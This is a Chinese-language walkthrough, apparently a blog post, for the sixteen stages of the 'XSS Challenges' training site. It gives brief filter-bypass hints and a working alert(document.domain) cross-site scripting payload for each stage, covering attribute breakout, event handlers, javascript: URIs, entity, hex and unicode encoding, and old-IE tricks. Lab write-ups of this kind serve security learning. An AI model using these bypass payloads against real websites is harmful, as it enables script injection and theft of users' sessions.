• XSS Challenges


    Stage #1

    payload:

    <script>alert(document.domain);</script>

    Stage #2

    payload:

    "><script>alert(document.domain);</script>

    Stage #3

    burp抓包,在p2处输入payload

    payload:

    </option><script>alert(document.domain)</script>

    Stage #4

    burp抓包,p3处输入payload

    payload:

    “><svg onload=alert(document.domain)>

    Stage #5

    更改p1处的maxlength="15"

    payload:

    "><script>alert(document.domain);</script>

    Stage #6

    输入<>会被替换&lt; &gt;

    payload:

    "onmouseover="alert(document.domain);

    Stage #7

    输入空格过滤

    payload:

    qwe onmouseover=alert(document.domain);

    Stage #8

    用伪协议执行script

    payload:

    javascript:alert(document.domain)

    Stage #9

    utf-7编码(现在基本很少使用)用旧版IE,在前端输入绕过

    payload:

    "onmouseover="alert(document.domain)

    Stage #10

    双写绕过

    payload:

    "><script>alert(document.domdomainain);</script>

    Stage #11

    过滤js脚本字符和事件字符,考虑<a>标签名

    payload:

    "><a href="java&#115;cript:alert(document.domain);">1</a>

    Stage #12

    利用IE浏览器的 `` 过滤

    payload:

    ``onmouseover=alert(document.domain);

    Stage #13

    用旧版IE特性触发xss

    payload:

    background-color:#ffff;background:url("javascript:alert(document.domain);");

    Stage #14

    用旧版IE特性触发xss

    payload:

    xss:ex/**/pression(if(!window.x){alert(document.domain);window.x=1})

    Stage #15

    用16进制编码或unicode编码绕过过滤

    payload:

    \x3cscript\x3ealert(document.domain);\x3c/script\x3e

    Stage #16

    用unicode编码绕过过滤

    payload:

    \u003cscript\u003ealert(document.domain);\u003c/script\u003e
  • 相关阅读:
    用硬件卡克隆Linux集群
    基于Linux系统WINE虚拟机技术的研究
    Rpm另类用法加固Linux安全
    基于TC技术的网络流量控制实战
    开源世界里的七剑
    借Stunnel工具保护E-mail服务器
    如何应对DDOS网络攻击(之二)
    如何应对DDOS网络攻击
    Leetcode-983 Minimum Cost For Tickets(最低票价)
    Leetcode-413 Arithmetic Slices(等差数列划分)
  • 原文地址:https://www.cnblogs.com/f1veseven/p/13290393.html
Copyright © 2020-2023  润新知